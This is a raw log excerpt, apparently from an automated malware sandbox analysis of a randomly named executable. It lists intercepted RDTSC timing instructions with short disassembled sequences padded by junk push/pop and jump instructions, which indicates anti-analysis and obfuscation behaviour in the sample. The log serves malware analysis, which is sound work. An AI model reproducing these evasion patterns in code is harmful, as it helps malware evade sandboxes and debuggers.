Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12E9683 second address: 12E9687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12E9687 second address: 12E969E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4970D67E91h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12E969E second address: 12E96A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12E96A3 second address: 12E96A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12E96A9 second address: 12E96BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F4970E062C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12E96BA second address: 12E96BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12E96BE second address: 12E96DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jl 00007F4970E062C6h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jc 00007F4970E062C6h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12E96DE second address: 12E96E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12E96E2 second address: 12E96E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12EF01B second address: 12EF01F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12EF322 second address: 12EF33B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062D5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12EF5E3 second address: 12EF5E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12EF891 second address: 12EF897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12EF897 second address: 12EF8C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F4970D67E8Dh 0x0000000b pop edi 0x0000000c jmp 00007F4970D67E90h 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12EF8C1 second address: 12EF8D9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4970E062D0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F03B1 second address: 12F03DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnc 00007F4970D67E86h 0x0000000e jp 00007F4970D67E86h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F4970D67E8Ah 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F03DB second address: 12F03E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F3047 second address: 12F304D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F31D4 second address: 12F31D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F31D8 second address: 12F31DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F31DE second address: 12F31E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F31E4 second address: 12F31E9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F3347 second address: 12F334B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F334B second address: 12F334F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F334F second address: 12F3359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F368C second address: 12F3690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F3690 second address: 12F369A instructions: 0x00000000 rdtsc 0x00000002 js 00007F4970E062C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F881C second address: 12F8821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F8821 second address: 12F8850 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4970E062D2h 0x00000008 jg 00007F4970E062CEh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007F4970E062F7h 0x00000016 pushad 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F8850 second address: 12F8856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F8856 second address: 12F8876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4970E062D9h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F7B38 second address: 12F7B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4970D67E86h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4970D67E94h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F8207 second address: 12F825F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4970E062D6h 0x0000000b popad 0x0000000c jmp 00007F4970E062D6h 0x00000011 pushad 0x00000012 jmp 00007F4970E062D7h 0x00000017 push ebx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a jng 00007F4970E062C6h 0x00000020 pop ebx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F83C8 second address: 12F83E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F83E8 second address: 12F83EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F83EC second address: 12F83F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12F83F0 second address: 12F83F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1300E25 second address: 1300E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4970D67E90h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4970D67E8Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1300E4C second address: 1300E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1300E50 second address: 1300E5A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4970D67E86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12FEF5E second address: 12FEF6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 jg 00007F4970E062CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12FF375 second address: 12FF37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12FFCA1 second address: 12FFCD4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F4970E062D0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4970E062D9h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12FFCD4 second address: 12FFCD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1300B4A second address: 1300B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4970E062C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1300B56 second address: 1300B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F4970D67E86h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1300B65 second address: 1300B6B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1300B6B second address: 1300B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1308B1C second address: 1308B22 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13091F0 second address: 13091F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13091F4 second address: 13091F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13091F8 second address: 1309206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F4970D67E8Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13127D1 second address: 13127D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13127D7 second address: 13127DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1310979 second address: 131097F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13110B4 second address: 13110CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4970D67E91h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1311230 second address: 131123C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4970E062C6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 131123C second address: 1311254 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F4970D67E8Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1311254 second address: 131125A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13117E4 second address: 1311805 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4970D67E86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4970D67E93h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1311805 second address: 131180F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4970E062C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1310483 second address: 1310489 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1310489 second address: 13104B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4970E062CBh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4970E062D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13104B7 second address: 13104BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13104BB second address: 13104BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13104BF second address: 13104C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13104C5 second address: 13104CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13104CA second address: 13104D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13187AE second address: 13187B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13187B4 second address: 13187B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 131890B second address: 1318915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4970E062C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1318915 second address: 1318921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1318921 second address: 131893C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4970E062CCh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 131893C second address: 131894C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4970D67E86h 0x00000008 ja 00007F4970D67E86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 131894C second address: 1318951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1329F26 second address: 1329F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1329F2B second address: 1329F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1329F31 second address: 1329F45 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4970D67E86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F4970D67E86h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 132D503 second address: 132D509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 132D509 second address: 132D50D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 132D50D second address: 132D517 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4970E062C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 132D667 second address: 132D66D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13326CA second address: 13326D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4970E062C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13326D6 second address: 13326DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13326DB second address: 13326E0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1338F97 second address: 1338FBB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4970D67E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007F4970D67E98h 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 133F6E7 second address: 133F6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 133F6F4 second address: 133F6F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1341C2C second address: 1341C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4970E062D6h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1341C48 second address: 1341C4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13441F5 second address: 13441F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1349771 second address: 13497D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4970D67E93h 0x00000009 jmp 00007F4970D67E91h 0x0000000e popad 0x0000000f pushad 0x00000010 jc 00007F4970D67E86h 0x00000016 push edx 0x00000017 pop edx 0x00000018 jmp 00007F4970D67E8Dh 0x0000001d popad 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F4970D67E94h 0x00000026 jo 00007F4970D67E86h 0x0000002c popad 0x0000002d popad 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13497D5 second address: 13497DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 134993A second address: 1349940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1349940 second address: 1349947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1349947 second address: 134995D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F4970D67E8Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1349AA0 second address: 1349AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1349E9E second address: 1349EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4970D67E86h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1349EAC second address: 1349EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F4970E062CCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
